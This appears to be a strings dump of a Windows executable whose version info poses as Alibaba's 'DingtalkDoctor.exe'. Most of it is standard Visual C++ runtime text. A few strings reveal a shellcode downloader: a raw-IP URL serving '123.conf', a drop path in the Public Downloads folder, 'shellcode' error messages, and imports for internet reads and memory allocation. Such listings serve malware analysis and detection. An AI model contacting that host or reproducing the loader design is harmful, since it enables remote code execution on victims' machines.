!This program cannot be run in DOS mode.
`.rdata
@.data
.pdata
@.reloc
B.rsrc
generic
iostream
system
iostream stream error
bad locale name
bad cast
Unknown exception
bad allocation
Visual C++ CRT: Not enough memory to complete call to strerror.
bad exception
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
CorExitProcess
Illegal byte sequence
Directory not empty
Function not implemented
No locks available
Filename too long
Resource deadlock avoided
Result too large
Domain error
Broken pipe
Too many links
Read-only file system
Invalid seek
No space left on device
File too large
Inappropriate I/O control operation
Too many open files
Too many open files in system
Invalid argument
Is a directory
Not a directory
No such device
Improper link
File exists
Resource device
Unknown error
Bad address
Permission denied
Not enough space
Resource temporarily unavailable
No child processes
Bad file descriptor
Exec format error
Arg list too long
No such device or address
Input/output error
Interrupted function call
No such process
No such file or directory
Operation not permitted
No error
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
britain
america
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
Norwegian-Nynorsk
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
RookIE/1.0
http://8.134.180.138/123.conf
C:\Users\Public\Downloads\1.conf
Failed to open shellcode file
Failed to get file size
Failed to allocate memory for shellcode
Failed to read shellcode from file
invalid string position
string too long
CreateFileA
GetFileSize
VirtualFree
ReadFile
VirtualAlloc
CloseHandle
DeleteFileA
KERNEL32.dll
InternetOpenUrlA
InternetReadFile
InternetOpenA
InternetCloseHandle
WININET.dll
EncodePointer
DecodePointer
InitializeCriticalSection
DeleteCriticalSection
EnterCriticalSection
LeaveCriticalSection
GetCommandLineW
GetStartupInfoW
RaiseException
RtlPcToFileHeader
RtlLookupFunctionEntry
RtlUnwindEx
GetLastError
HeapFree
WideCharToMultiByte
LCMapStringW
MultiByteToWideChar
GetCPInfo
HeapAlloc
InitializeCriticalSectionAndSpinCount
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
RtlVirtualUnwind
RtlCaptureContext
TerminateProcess
GetCurrentProcess
WriteFile
GetConsoleCP
GetConsoleMode
GetProcAddress
GetModuleHandleW
ExitProcess
GetStdHandle
GetModuleFileNameW
FreeEnvironmentStringsW
GetEnvironmentStringsW
SetHandleCount
GetFileType
FlsGetValue
FlsSetValue
FlsFree
SetLastError
GetCurrentThreadId
FlsAlloc
HeapSetInformation
GetVersion
HeapCreate
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
GetLocaleInfoW
HeapSize
FlushFileBuffers
SetFilePointer
GetACP
GetOEMCP
IsValidCodePage
GetStringTypeW
HeapReAlloc
GetUserDefaultLCID
GetLocaleInfoA
EnumSystemLocalesA
IsValidLocale
CreateFileW
WriteConsoleW
SetStdHandle
LoadLibraryW
SetEndOfFile
GetProcessHeap
.?AVerror_category@std@@
.?AV_Generic_error_category@std@@
.?AV_Iostream_error_category@std@@
.?AV_System_error_category@std@@
.?AVfacet@locale@std@@
.?AUctype_base@std@@
.?AVios_base@std@@
.?AV?$_Iosb@H@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$ctype@D@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AVbad_cast@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AVcodecvt_base@std@@
.?AV?$codecvt@DDH@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AV_Locimp@locale@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVruntime_error@std@@
.?AVexception@std@@
.?AVfailure@ios_base@std@@
.?AVsystem_error@std@@
.?AVbad_alloc@std@@
UTF-16LE
UNICODE
mscoree.dll
runtime error
TLOSS error
SING error
DOMAIN error
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
- abort() has been called
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
USER32.DLL
CONOUT$
C:\Users\Public\Downloads\1.conf
VS_VERSION_INFO
StringFileInfo
000904b0
CompanyName
Alibaba Group.
FileDescription
DingtalkDoctor
FileVersion
1.0.0.0
InternalName
DingtalkDoctor.exe
LegalCopyright
DingTalk Copyright@2017. Alibaba Group All rights reserved.
OriginalFilename
DingtalkDoctor.exe
ProductName
DingtalkDoctor
ProductVersion
1.0.0.0
080404b0
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
DingtalkDoctor.exe
LegalCopyright
Copyright@2017.
All rights reserved.
OriginalFilename
DingtalkDoctor.exe
ProductName
ProductVersion
1.0.0.0
VarFileInfo
Translation